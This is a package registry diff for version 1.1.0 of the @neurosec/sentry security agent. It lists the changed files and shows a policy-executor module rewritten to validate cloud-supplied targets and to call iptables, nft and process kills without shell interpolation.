@neurosec/sentry 1.0.20 → 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +4 -0
- package/dist/api-auth.d.ts +31 -0
- package/dist/api-auth.d.ts.map +1 -0
- package/dist/api-auth.js +105 -0
- package/dist/api-auth.js.map +1 -0
- package/dist/api-auth.test.d.ts +2 -0
- package/dist/api-auth.test.d.ts.map +1 -0
- package/dist/api-auth.test.js +89 -0
- package/dist/api-auth.test.js.map +1 -0
- package/dist/api.d.ts +8 -7
- package/dist/api.d.ts.map +1 -1
- package/dist/api.js +141 -134
- package/dist/api.js.map +1 -1
- package/dist/cli.d.ts +1 -1
- package/dist/cli.d.ts.map +1 -1
- package/dist/cli.js +107 -14
- package/dist/cli.js.map +1 -1
- package/dist/cli.test.d.ts +2 -0
- package/dist/cli.test.d.ts.map +1 -0
- package/dist/cli.test.js +68 -0
- package/dist/cli.test.js.map +1 -0
- package/dist/config.d.ts +30 -0
- package/dist/config.d.ts.map +1 -1
- package/dist/config.js +50 -1
- package/dist/config.js.map +1 -1
- package/dist/discovery-win.d.ts +4 -0
- package/dist/discovery-win.d.ts.map +1 -0
- package/dist/discovery-win.js +153 -0
- package/dist/discovery-win.js.map +1 -0
- package/dist/discovery.d.ts.map +1 -1
- package/dist/discovery.js +23 -97
- package/dist/discovery.js.map +1 -1
- package/dist/discovery.test.js +18 -109
- package/dist/discovery.test.js.map +1 -1
- package/dist/enforcement/file-monitor.d.ts +9 -0
- package/dist/enforcement/file-monitor.d.ts.map +1 -1
- package/dist/enforcement/file-monitor.js +9 -2
- package/dist/enforcement/file-monitor.js.map +1 -1
- package/dist/enforcement/network-monitor.d.ts.map +1 -1
- package/dist/enforcement/network-monitor.js +350 -9
- package/dist/enforcement/network-monitor.js.map +1 -1
- package/dist/enforcement/network-monitor.test.d.ts +2 -0
- package/dist/enforcement/network-monitor.test.d.ts.map +1 -0
- package/dist/enforcement/network-monitor.test.js +52 -0
- package/dist/enforcement/network-monitor.test.js.map +1 -0
- package/dist/enforcement/policy-executor.d.ts +24 -1
- package/dist/enforcement/policy-executor.d.ts.map +1 -1
- package/dist/enforcement/policy-executor.js +213 -69
- package/dist/enforcement/policy-executor.js.map +1 -1
- package/dist/enforcement/policy-executor.test.d.ts +2 -0
- package/dist/enforcement/policy-executor.test.d.ts.map +1 -0
- package/dist/enforcement/policy-executor.test.js +46 -0
- package/dist/enforcement/policy-executor.test.js.map +1 -0
- package/dist/enforcement/target-validator.d.ts +37 -0
- package/dist/enforcement/target-validator.d.ts.map +1 -0
- package/dist/enforcement/target-validator.js +0 -0
- package/dist/enforcement/target-validator.js.map +1 -0
- package/dist/enforcement/target-validator.test.d.ts +2 -0
- package/dist/enforcement/target-validator.test.d.ts.map +1 -0
- package/dist/enforcement/target-validator.test.js +103 -0
- package/dist/enforcement/target-validator.test.js.map +1 -0
- package/dist/http-client.d.ts +35 -0
- package/dist/http-client.d.ts.map +1 -0
- package/dist/http-client.js +168 -0
- package/dist/http-client.js.map +1 -0
- package/dist/http-client.test.d.ts +2 -0
- package/dist/http-client.test.d.ts.map +1 -0
- package/dist/http-client.test.js +172 -0
- package/dist/http-client.test.js.map +1 -0
- package/dist/index.js +190 -114
- package/dist/index.js.map +1 -1
- package/dist/launcher.d.ts +33 -0
- package/dist/launcher.d.ts.map +1 -0
- package/dist/launcher.js +425 -0
- package/dist/launcher.js.map +1 -0
- package/dist/launcher.test.d.ts +2 -0
- package/dist/launcher.test.d.ts.map +1 -0
- package/dist/launcher.test.js +109 -0
- package/dist/launcher.test.js.map +1 -0
- package/dist/proxy/cert-manager.d.ts +24 -0
- package/dist/proxy/cert-manager.d.ts.map +1 -0
- package/dist/proxy/cert-manager.js +117 -0
- package/dist/proxy/cert-manager.js.map +1 -0
- package/dist/proxy/cert-manager.test.d.ts +2 -0
- package/dist/proxy/cert-manager.test.d.ts.map +1 -0
- package/dist/proxy/cert-manager.test.js +70 -0
- package/dist/proxy/cert-manager.test.js.map +1 -0
- package/dist/proxy/index.d.ts +61 -0
- package/dist/proxy/index.d.ts.map +1 -0
- package/dist/proxy/index.js +74 -0
- package/dist/proxy/index.js.map +1 -0
- package/dist/proxy/policy-enforcer.d.ts +30 -0
- package/dist/proxy/policy-enforcer.d.ts.map +1 -0
- package/dist/proxy/policy-enforcer.js +143 -0
- package/dist/proxy/policy-enforcer.js.map +1 -0
- package/dist/proxy/proxy-server.d.ts +42 -0
- package/dist/proxy/proxy-server.d.ts.map +1 -0
- package/dist/proxy/proxy-server.js +652 -0
- package/dist/proxy/proxy-server.js.map +1 -0
- package/dist/proxy/redaction-engine.d.ts +4 -0
- package/dist/proxy/redaction-engine.d.ts.map +1 -0
- package/dist/proxy/redaction-engine.js +50 -0
- package/dist/proxy/redaction-engine.js.map +1 -0
- package/dist/proxy/response-redaction.test.d.ts +2 -0
- package/dist/proxy/response-redaction.test.d.ts.map +1 -0
- package/dist/proxy/response-redaction.test.js +125 -0
- package/dist/proxy/response-redaction.test.js.map +1 -0
- package/dist/proxy/threat-engine.d.ts +22 -0
- package/dist/proxy/threat-engine.d.ts.map +1 -0
- package/dist/proxy/threat-engine.js +291 -0
- package/dist/proxy/threat-engine.js.map +1 -0
- package/dist/proxy/threat-engine.test.d.ts +2 -0
- package/dist/proxy/threat-engine.test.d.ts.map +1 -0
- package/dist/proxy/threat-engine.test.js +27 -0
- package/dist/proxy/threat-engine.test.js.map +1 -0
- package/dist/redirect/env-injector.d.ts +72 -0
- package/dist/redirect/env-injector.d.ts.map +1 -0
- package/dist/redirect/env-injector.js +177 -0
- package/dist/redirect/env-injector.js.map +1 -0
- package/dist/redirect/env-injector.test.d.ts +2 -0
- package/dist/redirect/env-injector.test.d.ts.map +1 -0
- package/dist/redirect/env-injector.test.js +91 -0
- package/dist/redirect/env-injector.test.js.map +1 -0
- package/dist/redirect/index.d.ts +3 -0
- package/dist/redirect/index.d.ts.map +1 -0
- package/dist/redirect/index.js +8 -0
- package/dist/redirect/index.js.map +1 -0
- package/dist/redirect/platform-redirect.d.ts +42 -0
- package/dist/redirect/platform-redirect.d.ts.map +1 -0
- package/dist/redirect/platform-redirect.js +229 -0
- package/dist/redirect/platform-redirect.js.map +1 -0
- package/dist/redirect/platform-redirect.test.d.ts +2 -0
- package/dist/redirect/platform-redirect.test.d.ts.map +1 -0
- package/dist/redirect/platform-redirect.test.js +76 -0
- package/dist/redirect/platform-redirect.test.js.map +1 -0
- package/dist/sandbox/index.d.ts +23 -2
- package/dist/sandbox/index.d.ts.map +1 -1
- package/dist/sandbox/index.js +24 -7
- package/dist/sandbox/index.js.map +1 -1
- package/dist/sandbox/linux-sandbox.d.ts +13 -2
- package/dist/sandbox/linux-sandbox.d.ts.map +1 -1
- package/dist/sandbox/linux-sandbox.js +61 -27
- package/dist/sandbox/linux-sandbox.js.map +1 -1
- package/dist/sandbox/macos-sandbox.d.ts +15 -4
- package/dist/sandbox/macos-sandbox.d.ts.map +1 -1
- package/dist/sandbox/macos-sandbox.js +36 -18
- package/dist/sandbox/macos-sandbox.js.map +1 -1
- package/dist/sandbox/sandbox-result.test.d.ts +2 -0
- package/dist/sandbox/sandbox-result.test.d.ts.map +1 -0
- package/dist/sandbox/sandbox-result.test.js +87 -0
- package/dist/sandbox/sandbox-result.test.js.map +1 -0
- package/dist/sandbox/windows-sandbox.d.ts +34 -0
- package/dist/sandbox/windows-sandbox.d.ts.map +1 -0
- package/dist/sandbox/windows-sandbox.js +161 -0
- package/dist/sandbox/windows-sandbox.js.map +1 -0
- package/dist/setup.d.ts.map +1 -1
- package/dist/setup.js +33 -43
- package/dist/setup.js.map +1 -1
- package/dist/skill-authz/skill-evaluator.d.ts +30 -0
- package/dist/skill-authz/skill-evaluator.d.ts.map +1 -1
- package/dist/skill-authz/skill-evaluator.js +161 -30
- package/dist/skill-authz/skill-evaluator.js.map +1 -1
- package/dist/skill-authz/skill-evaluator.test.d.ts +2 -0
- package/dist/skill-authz/skill-evaluator.test.d.ts.map +1 -0
- package/dist/skill-authz/skill-evaluator.test.js +127 -0
- package/dist/skill-authz/skill-evaluator.test.js.map +1 -0
- package/dist/telemetry.d.ts +2 -8
- package/dist/telemetry.d.ts.map +1 -1
- package/dist/telemetry.js +17 -147
- package/dist/telemetry.js.map +1 -1
- package/dist/types.d.ts +48 -105
- package/dist/types.d.ts.map +1 -1
- package/dist/types.js +34 -1
- package/dist/types.js.map +1 -1
- package/package.json +7 -3
- package/scripts/install-sentry-windows.ps1 +217 -0
|
@@ -4,36 +4,101 @@ exports.PolicyExecutor = void 0;
|
|
|
4
4
|
const child_process_1 = require("child_process");
|
|
5
5
|
const types_1 = require("../types");
|
|
6
6
|
const logger_1 = require("../logger");
|
|
7
|
+
const target_validator_1 = require("./target-validator");
|
|
8
|
+
/**
|
|
9
|
+
* Executes cloud-supplied policies on the local host.
|
|
10
|
+
*
|
|
11
|
+
* SECURITY INVARIANTS:
|
|
12
|
+
* - Every `target` from a policy is validated via {@link validateTarget}
|
|
13
|
+
* before reaching any subprocess. Invalid targets are dropped, not
|
|
14
|
+
* "best-effort" passed through.
|
|
15
|
+
* - All subprocess invocations use {@link execFileSync} with separate args —
|
|
16
|
+
* no shell metacharacter interpolation, ever.
|
|
17
|
+
* - PID validation rejects values outside the kernel's PID range (1..4194304).
|
|
18
|
+
* - Iptables / nft binaries are resolved once at construction; we never
|
|
19
|
+
* accept a `bin` path from the cloud.
|
|
20
|
+
*/
|
|
7
21
|
class PolicyExecutor {
|
|
8
22
|
constructor(config) {
|
|
9
23
|
this.config = config;
|
|
10
|
-
this.appliedRules = new
|
|
24
|
+
this.appliedRules = new Map();
|
|
11
25
|
this.lastPolicies = [];
|
|
26
|
+
this.iptablesBin = this.resolveBin('iptables');
|
|
27
|
+
this.nftBin = this.resolveBin('nft');
|
|
28
|
+
}
|
|
29
|
+
resolveBin(name) {
|
|
30
|
+
// Prefer absolute paths to avoid PATH-injection via a shell PATH manipulation.
|
|
31
|
+
for (const dir of ['/usr/sbin', '/sbin', '/usr/local/sbin', '/usr/bin', '/bin']) {
|
|
32
|
+
const candidate = `${dir}/${name}`;
|
|
33
|
+
try {
|
|
34
|
+
(0, child_process_1.execFileSync)(candidate, ['--version'], { timeout: 2000, stdio: 'ignore' });
|
|
35
|
+
return candidate;
|
|
36
|
+
}
|
|
37
|
+
catch {
|
|
38
|
+
continue;
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
return null;
|
|
12
42
|
}
|
|
13
|
-
// Apply policies to the current host — returns list of actions taken
|
|
14
43
|
async apply(policies, taggedProcesses) {
|
|
15
44
|
const results = [];
|
|
16
45
|
const hostId = this.config.sentry.hostId;
|
|
17
|
-
|
|
46
|
+
const previousPolicies = new Map(this.lastPolicies.map(policy => [policy.id, policy]));
|
|
18
47
|
const active = policies.filter(p => p.enabled && (!p.hostId || p.hostId === hostId));
|
|
19
48
|
for (const policy of active) {
|
|
49
|
+
const previous = previousPolicies.get(policy.id);
|
|
50
|
+
const unchanged = previous
|
|
51
|
+
&& previous.type === policy.type
|
|
52
|
+
&& previous.target === policy.target
|
|
53
|
+
&& previous.action === policy.action
|
|
54
|
+
&& previous.enabled === policy.enabled
|
|
55
|
+
&& previous.hostId === policy.hostId;
|
|
56
|
+
if (policy.type !== 'kill_process' && unchanged && this.appliedRules.has(policy.id)) {
|
|
57
|
+
results.push({
|
|
58
|
+
policyId: policy.id,
|
|
59
|
+
action: policy.type,
|
|
60
|
+
target: policy.target,
|
|
61
|
+
applied: true,
|
|
62
|
+
detail: 'Rule already active',
|
|
63
|
+
});
|
|
64
|
+
continue;
|
|
65
|
+
}
|
|
66
|
+
if (policy.type !== 'kill_process' && this.appliedRules.has(policy.id)) {
|
|
67
|
+
this.removeRule(policy.id);
|
|
68
|
+
}
|
|
69
|
+
const validated = (0, target_validator_1.validateTarget)(policy.target);
|
|
70
|
+
if (validated.kind === 'invalid') {
|
|
71
|
+
logger_1.logger.warn('Rejected policy with invalid target (possible injection attempt)', {
|
|
72
|
+
policyId: policy.id,
|
|
73
|
+
policyType: policy.type,
|
|
74
|
+
// Truncate to avoid log injection via huge target strings
|
|
75
|
+
target: String(policy.target).slice(0, 64),
|
|
76
|
+
});
|
|
77
|
+
results.push({
|
|
78
|
+
policyId: policy.id,
|
|
79
|
+
action: policy.type,
|
|
80
|
+
target: '',
|
|
81
|
+
applied: false,
|
|
82
|
+
detail: 'Rejected: invalid target',
|
|
83
|
+
});
|
|
84
|
+
continue;
|
|
85
|
+
}
|
|
20
86
|
switch (policy.type) {
|
|
21
87
|
case 'kill_process':
|
|
22
|
-
results.push(
|
|
88
|
+
results.push(this.applyKillProcess(policy, validated, taggedProcesses));
|
|
23
89
|
break;
|
|
24
90
|
case 'block_provider':
|
|
25
|
-
results.push(this.applyBlockProvider(policy));
|
|
91
|
+
results.push(this.applyBlockProvider(policy, validated));
|
|
26
92
|
break;
|
|
27
93
|
case 'block_domain':
|
|
28
|
-
results.push(this.applyBlockDomain(policy));
|
|
94
|
+
results.push(this.applyBlockDomain(policy, validated));
|
|
29
95
|
break;
|
|
30
96
|
}
|
|
31
97
|
}
|
|
32
98
|
// Remove rules for policies that no longer exist
|
|
33
|
-
for (const ruleId of this.appliedRules) {
|
|
99
|
+
for (const ruleId of Array.from(this.appliedRules.keys())) {
|
|
34
100
|
if (!active.some(p => p.id === ruleId)) {
|
|
35
101
|
this.removeRule(ruleId);
|
|
36
|
-
this.appliedRules.delete(ruleId);
|
|
37
102
|
}
|
|
38
103
|
}
|
|
39
104
|
this.lastPolicies = active;
|
|
@@ -43,80 +108,73 @@ class PolicyExecutor {
|
|
|
43
108
|
}
|
|
44
109
|
return results;
|
|
45
110
|
}
|
|
46
|
-
|
|
47
|
-
const
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
if (pidMatch) {
|
|
51
|
-
const targetPid = parseInt(pidMatch[1], 10);
|
|
52
|
-
const proc = processes.find(p => p.pid === targetPid);
|
|
111
|
+
applyKillProcess(policy, target, processes) {
|
|
112
|
+
const signal = policy.action === 'sigkill' ? 'SIGKILL' : 'SIGTERM';
|
|
113
|
+
if (target.kind === 'pid' && target.pid !== undefined) {
|
|
114
|
+
const proc = processes.find(p => p.pid === target.pid);
|
|
53
115
|
if (!proc) {
|
|
54
|
-
return { policyId: policy.id, action: 'kill_process', target:
|
|
116
|
+
return { policyId: policy.id, action: 'kill_process', target: target.value, applied: false, detail: 'No matching process found' };
|
|
55
117
|
}
|
|
56
|
-
const signal = policy.action === 'sigkill' ? 'SIGKILL' : 'SIGTERM';
|
|
57
118
|
try {
|
|
58
|
-
process.kill(
|
|
59
|
-
logger_1.logger.info('Policy: kill_process (pid)', { target:
|
|
60
|
-
return { policyId: policy.id, action: 'kill_process', target:
|
|
119
|
+
process.kill(target.pid, signal);
|
|
120
|
+
logger_1.logger.info('Policy: kill_process (pid)', { target: target.value, pid: target.pid, signal });
|
|
121
|
+
return { policyId: policy.id, action: 'kill_process', target: target.value, applied: true, detail: `Killed pid ${target.pid} with ${signal}` };
|
|
61
122
|
}
|
|
62
123
|
catch {
|
|
63
|
-
|
|
64
|
-
(0, child_process_1.execSync)(`kill -${signal === 'SIGKILL' ? 9 : 15} ${targetPid}`, { timeout: 3000 });
|
|
65
|
-
logger_1.logger.info('Policy: kill_process (pid, fallback)', { target: policy.target, pid: targetPid, signal });
|
|
66
|
-
return { policyId: policy.id, action: 'kill_process', target: policy.target, applied: true, detail: `Killed pid ${targetPid} with ${signal}` };
|
|
67
|
-
}
|
|
68
|
-
catch {
|
|
69
|
-
return { policyId: policy.id, action: 'kill_process', target: policy.target, applied: false, detail: 'Process may already be gone' };
|
|
70
|
-
}
|
|
124
|
+
return { policyId: policy.id, action: 'kill_process', target: target.value, applied: false, detail: 'Process may already be gone' };
|
|
71
125
|
}
|
|
72
126
|
}
|
|
73
|
-
|
|
127
|
+
if (target.kind !== 'framework' && target.kind !== 'hostname') {
|
|
128
|
+
return { policyId: policy.id, action: 'kill_process', target: target.value, applied: false, detail: 'Target must be pid:N, framework id, or hostname for kill_process' };
|
|
129
|
+
}
|
|
130
|
+
const lowered = target.value.toLowerCase();
|
|
74
131
|
const matched = processes.filter(p => {
|
|
75
|
-
if (p.frameworkId ===
|
|
132
|
+
if (p.frameworkId === lowered)
|
|
76
133
|
return true;
|
|
77
|
-
if (p.frameworkName?.toLowerCase() ===
|
|
134
|
+
if (p.frameworkName?.toLowerCase() === lowered)
|
|
78
135
|
return true;
|
|
79
|
-
|
|
136
|
+
// command match restricted to a substring of the framework token to
|
|
137
|
+
// avoid greedy matches on free-form text.
|
|
138
|
+
if (target.kind === 'framework' && p.command?.toLowerCase().includes(lowered))
|
|
80
139
|
return true;
|
|
81
140
|
return false;
|
|
82
141
|
});
|
|
83
142
|
if (matched.length === 0) {
|
|
84
|
-
return { policyId: policy.id, action: 'kill_process', target:
|
|
143
|
+
return { policyId: policy.id, action: 'kill_process', target: target.value, applied: false, detail: 'No matching process found' };
|
|
85
144
|
}
|
|
86
|
-
const signal = policy.action === 'sigkill' ? 'SIGKILL' : 'SIGTERM';
|
|
87
145
|
let killed = 0;
|
|
88
146
|
for (const proc of matched) {
|
|
89
147
|
try {
|
|
90
148
|
process.kill(proc.pid, signal);
|
|
91
149
|
killed++;
|
|
92
150
|
}
|
|
93
|
-
catch {
|
|
94
|
-
try {
|
|
95
|
-
(0, child_process_1.execSync)(`kill -${signal === 'SIGKILL' ? 9 : 15} ${proc.pid}`, { timeout: 3000 });
|
|
96
|
-
killed++;
|
|
97
|
-
}
|
|
98
|
-
catch { /* process may already be gone */ }
|
|
99
|
-
}
|
|
151
|
+
catch { /* process may already be gone */ }
|
|
100
152
|
}
|
|
101
153
|
const detail = killed > 0 ? `Killed ${killed} process(es) with ${signal}` : 'Failed to kill processes';
|
|
102
|
-
logger_1.logger.info('Policy: kill_process', { target:
|
|
103
|
-
return { policyId: policy.id, action: 'kill_process', target:
|
|
154
|
+
logger_1.logger.info('Policy: kill_process', { target: target.value, killed, signal });
|
|
155
|
+
return { policyId: policy.id, action: 'kill_process', target: target.value, applied: killed > 0, detail };
|
|
104
156
|
}
|
|
105
|
-
applyBlockProvider(policy) {
|
|
106
|
-
|
|
157
|
+
applyBlockProvider(policy, target) {
|
|
158
|
+
// Provider matching is by id or name only — both already constrained by FRAMEWORK_RE / HOSTNAME_RE.
|
|
159
|
+
const provider = types_1.LLM_PROVIDER_SIGNATURES.find(p => p.id === target.value || p.name === target.value);
|
|
107
160
|
if (!provider) {
|
|
108
|
-
return { policyId: policy.id, action: 'block_provider', target:
|
|
161
|
+
return { policyId: policy.id, action: 'block_provider', target: target.value, applied: false, detail: `Unknown provider: ${target.value}` };
|
|
109
162
|
}
|
|
110
|
-
const ruleId = `sentry-block-${provider.id}`;
|
|
111
163
|
let success = 0;
|
|
164
|
+
const appliedRules = [];
|
|
112
165
|
for (const domain of provider.domains) {
|
|
113
|
-
|
|
114
|
-
|
|
166
|
+
const domainTarget = (0, target_validator_1.validateTarget)(domain);
|
|
167
|
+
if (!(0, target_validator_1.isNetworkTarget)(domainTarget))
|
|
168
|
+
continue; // defense in depth
|
|
169
|
+
const appliedRule = this.addNetworkBlockRule(policy.id, domainTarget);
|
|
170
|
+
if (appliedRule) {
|
|
171
|
+
appliedRules.push(appliedRule);
|
|
115
172
|
success++;
|
|
116
173
|
}
|
|
117
|
-
catch { /* best-effort */ }
|
|
118
174
|
}
|
|
119
|
-
|
|
175
|
+
if (appliedRules.length > 0) {
|
|
176
|
+
this.appliedRules.set(policy.id, appliedRules);
|
|
177
|
+
}
|
|
120
178
|
if (success > 0) {
|
|
121
179
|
logger_1.logger.info('Policy: block_provider', { provider: provider.name, domains: success });
|
|
122
180
|
}
|
|
@@ -125,33 +183,119 @@ class PolicyExecutor {
|
|
|
125
183
|
action: 'block_provider',
|
|
126
184
|
target: provider.name,
|
|
127
185
|
applied: success > 0,
|
|
128
|
-
detail: success > 0 ? `Blocked ${success} domain(s)
|
|
186
|
+
detail: success > 0 ? `Blocked ${success} domain(s)` : 'No domains blocked (try running as root)',
|
|
129
187
|
};
|
|
130
188
|
}
|
|
131
|
-
applyBlockDomain(policy) {
|
|
132
|
-
|
|
133
|
-
|
|
134
|
-
this.addIptablesRule(ruleId, policy.target);
|
|
135
|
-
this.appliedRules.add(ruleId);
|
|
136
|
-
logger_1.logger.info('Policy: block_domain', { target: policy.target });
|
|
137
|
-
return { policyId: policy.id, action: 'block_domain', target: policy.target, applied: true, detail: `Blocked ${policy.target} via iptables` };
|
|
189
|
+
applyBlockDomain(policy, target) {
|
|
190
|
+
if (!(0, target_validator_1.isNetworkTarget)(target)) {
|
|
191
|
+
return { policyId: policy.id, action: 'block_domain', target: target.value, applied: false, detail: 'Target must be a hostname, IP, or CIDR' };
|
|
138
192
|
}
|
|
139
|
-
|
|
140
|
-
|
|
193
|
+
const appliedRule = this.addNetworkBlockRule(policy.id, target);
|
|
194
|
+
if (appliedRule) {
|
|
195
|
+
this.appliedRules.set(policy.id, [appliedRule]);
|
|
196
|
+
logger_1.logger.info('Policy: block_domain', { target: target.value });
|
|
197
|
+
return { policyId: policy.id, action: 'block_domain', target: target.value, applied: true, detail: `Blocked ${target.value}` };
|
|
141
198
|
}
|
|
199
|
+
return { policyId: policy.id, action: 'block_domain', target: target.value, applied: false, detail: 'iptables/nft unavailable or rejected the rule' };
|
|
142
200
|
}
|
|
143
|
-
|
|
144
|
-
|
|
145
|
-
|
|
146
|
-
|
|
201
|
+
/**
|
|
202
|
+
* Add an OUTPUT DROP rule. Each piece of `target` was pre-validated; we still
|
|
203
|
+
* call execFileSync with separate args so even a future regression in the
|
|
204
|
+
* validator cannot escape to a shell.
|
|
205
|
+
*/
|
|
206
|
+
addNetworkBlockRule(ruleId, target) {
|
|
207
|
+
// nft first (modern kernels)
|
|
208
|
+
if (this.nftBin) {
|
|
209
|
+
try {
|
|
210
|
+
(0, child_process_1.execFileSync)(this.nftBin, ['add', 'rule', 'inet', 'filter', 'output', 'ip', 'daddr', target.value, 'drop', 'comment', ruleId], { timeout: 5000, stdio: 'ignore' });
|
|
211
|
+
return { backend: 'nft', target: target.value };
|
|
212
|
+
}
|
|
213
|
+
catch {
|
|
214
|
+
// fall through to iptables
|
|
215
|
+
}
|
|
147
216
|
}
|
|
148
|
-
|
|
149
|
-
|
|
217
|
+
if (this.iptablesBin) {
|
|
218
|
+
try {
|
|
219
|
+
// -C first to dedupe; ignore exit code, then -A
|
|
220
|
+
try {
|
|
221
|
+
(0, child_process_1.execFileSync)(this.iptablesBin, ['-C', 'OUTPUT', '-d', target.value, '-j', 'DROP'], { timeout: 5000, stdio: 'ignore' });
|
|
222
|
+
return { backend: 'iptables', target: target.value };
|
|
223
|
+
}
|
|
224
|
+
catch { /* not present, add */ }
|
|
225
|
+
(0, child_process_1.execFileSync)(this.iptablesBin, ['-A', 'OUTPUT', '-d', target.value, '-j', 'DROP'], { timeout: 5000, stdio: 'ignore' });
|
|
226
|
+
return { backend: 'iptables', target: target.value };
|
|
227
|
+
}
|
|
228
|
+
catch {
|
|
229
|
+
return null;
|
|
230
|
+
}
|
|
150
231
|
}
|
|
232
|
+
return null;
|
|
151
233
|
}
|
|
152
234
|
removeRule(ruleId) {
|
|
153
|
-
|
|
154
|
-
|
|
235
|
+
const rules = this.appliedRules.get(ruleId);
|
|
236
|
+
if (!rules || rules.length === 0) {
|
|
237
|
+
return;
|
|
238
|
+
}
|
|
239
|
+
let removed = 0;
|
|
240
|
+
if (rules.some(rule => rule.backend === 'nft')) {
|
|
241
|
+
removed += this.removeNftRules(ruleId);
|
|
242
|
+
}
|
|
243
|
+
for (const rule of rules) {
|
|
244
|
+
if (rule.backend === 'iptables' && this.removeIptablesRule(rule.target)) {
|
|
245
|
+
removed++;
|
|
246
|
+
}
|
|
247
|
+
}
|
|
248
|
+
this.appliedRules.delete(ruleId);
|
|
249
|
+
logger_1.logger.debug('Policy rules removed', { ruleId, removed });
|
|
250
|
+
}
|
|
251
|
+
removeIptablesRule(target) {
|
|
252
|
+
if (!this.iptablesBin) {
|
|
253
|
+
return false;
|
|
254
|
+
}
|
|
255
|
+
let removed = false;
|
|
256
|
+
while (true) {
|
|
257
|
+
try {
|
|
258
|
+
(0, child_process_1.execFileSync)(this.iptablesBin, ['-D', 'OUTPUT', '-d', target, '-j', 'DROP'], {
|
|
259
|
+
timeout: 5000,
|
|
260
|
+
stdio: 'ignore',
|
|
261
|
+
});
|
|
262
|
+
removed = true;
|
|
263
|
+
}
|
|
264
|
+
catch {
|
|
265
|
+
break;
|
|
266
|
+
}
|
|
267
|
+
}
|
|
268
|
+
return removed;
|
|
269
|
+
}
|
|
270
|
+
removeNftRules(ruleId) {
|
|
271
|
+
if (!this.nftBin) {
|
|
272
|
+
return 0;
|
|
273
|
+
}
|
|
274
|
+
try {
|
|
275
|
+
const output = (0, child_process_1.execFileSync)(this.nftBin, ['-a', 'list', 'chain', 'inet', 'filter', 'output'], {
|
|
276
|
+
encoding: 'utf8',
|
|
277
|
+
timeout: 5000,
|
|
278
|
+
});
|
|
279
|
+
const handles = output
|
|
280
|
+
.split('\n')
|
|
281
|
+
.map((line) => {
|
|
282
|
+
if (!line.includes(`comment "${ruleId}"`)) {
|
|
283
|
+
return null;
|
|
284
|
+
}
|
|
285
|
+
return line.match(/# handle (\d+)/)?.[1] ?? null;
|
|
286
|
+
})
|
|
287
|
+
.filter((handle) => Boolean(handle));
|
|
288
|
+
for (const handle of handles) {
|
|
289
|
+
(0, child_process_1.execFileSync)(this.nftBin, ['delete', 'rule', 'inet', 'filter', 'output', 'handle', handle], {
|
|
290
|
+
timeout: 5000,
|
|
291
|
+
stdio: 'ignore',
|
|
292
|
+
});
|
|
293
|
+
}
|
|
294
|
+
return handles.length;
|
|
295
|
+
}
|
|
296
|
+
catch {
|
|
297
|
+
return 0;
|
|
298
|
+
}
|
|
155
299
|
}
|
|
156
300
|
}
|
|
157
301
|
exports.PolicyExecutor = PolicyExecutor;
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"policy-executor.js","sourceRoot":"","sources":["../../src/enforcement/policy-executor.ts"],"names":[],"mappings":";;;AACA,iDAAyC;AACzC,oCAAkE;AAElE,sCAAmC;AAoBnC,MAAa,cAAc;IAIzB,YAAoB,MAAoB;QAApB,WAAM,GAAN,MAAM,CAAc;QAHhC,iBAAY,GAAG,IAAI,GAAG,EAAU,CAAC;QACjC,iBAAY,GAAmB,EAAE,CAAC;IAEC,CAAC;IAE5C,qEAAqE;IACrE,KAAK,CAAC,KAAK,CACT,QAAwB,EACxB,eAAgC;QAEhC,MAAM,OAAO,GAAmB,EAAE,CAAC;QACnC,MAAM,MAAM,GAAG,IAAI,CAAC,MAAM,CAAC,MAAM,CAAC,MAAM,CAAC;QAEzC,0DAA0D;QAC1D,MAAM,MAAM,GAAG,QAAQ,CAAC,MAAM,CAAC,CAAC,CAAC,EAAE,CACjC,CAAC,CAAC,OAAO,IAAI,CAAC,CAAC,CAAC,CAAC,MAAM,IAAI,CAAC,CAAC,MAAM,KAAK,MAAM,CAAC,CAChD,CAAC;QAEF,KAAK,MAAM,MAAM,IAAI,MAAM,EAAE,CAAC;YAC5B,QAAQ,MAAM,CAAC,IAAI,EAAE,CAAC;gBACpB,KAAK,cAAc;oBACjB,OAAO,CAAC,IAAI,CAAC,MAAM,IAAI,CAAC,gBAAgB,CAAC,MAAM,EAAE,eAAe,CAAC,CAAC,CAAC;oBACnE,MAAM;gBACR,KAAK,gBAAgB;oBACnB,OAAO,CAAC,IAAI,CAAC,IAAI,CAAC,kBAAkB,CAAC,MAAM,CAAC,CAAC,CAAC;oBAC9C,MAAM;gBACR,KAAK,cAAc;oBACjB,OAAO,CAAC,IAAI,CAAC,IAAI,CAAC,gBAAgB,CAAC,MAAM,CAAC,CAAC,CAAC;oBAC5C,MAAM;YACV,CAAC;QACH,CAAC;QAED,iDAAiD;QACjD,KAAK,MAAM,MAAM,IAAI,IAAI,CAAC,YAAY,EAAE,CAAC;YACvC,IAAI,CAAC,MAAM,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC,CAAC,CAAC,EAAE,KAAK,MAAM,CAAC,EAAE,CAAC;gBACvC,IAAI,CAAC,UAAU,CAAC,MAAM,CAAC,CAAC;gBACxB,IAAI,CAAC,YAAY,CAAC,MAAM,CAAC,MAAM,CAAC,CAAC;YACnC,CAAC;QACH,CAAC;QAED,IAAI,CAAC,YAAY,GAAG,MAAM,CAAC;QAE3B,IAAI,OAAO,CAAC,MAAM,GAAG,CAAC,EAAE,CAAC;YACvB,MAAM,OAAO,GAAG,OAAO,CAAC,MAAM,CAAC,CAAC,CAAC,EAAE,CAAC,CAAC,CAAC,OAAO,CAAC,CAAC,MAAM,CAAC;YACtD,eAAM,CAAC,IAAI,CAAC,iBAAiB,EAAE,EAAE,KAAK,EAAE,OAAO,CAAC,MAAM,EAAE,OAAO,EAAE,CAAC,CAAC;QACrE,CAAC;QAED,OAAO,OAAO,CAAC;IACjB,CAAC;IAEO,KAAK,CAAC,gBAAgB,CAC5B,MAAoB,EACpB,SAA0B;QAE1B,MAAM,MAAM,GAAG,MAAM,CAAC,MAAM,CAAC,WAAW,EAAE,CAAC;QAE3C,mDAAmD;QACnD,MAAM,QAAQ,GAAG,MAAM,CAAC,KAAK,CAAC,aAAa,CAAC,CAAC;QAC7C,IAAI,QAAQ,EAAE,CAAC;YACb,MAAM,SAAS,GAAG,QAAQ,CAAC,QAAQ,CAAC,CAAC,CAAC,EAAE,EAAE,CAAC,CAAC;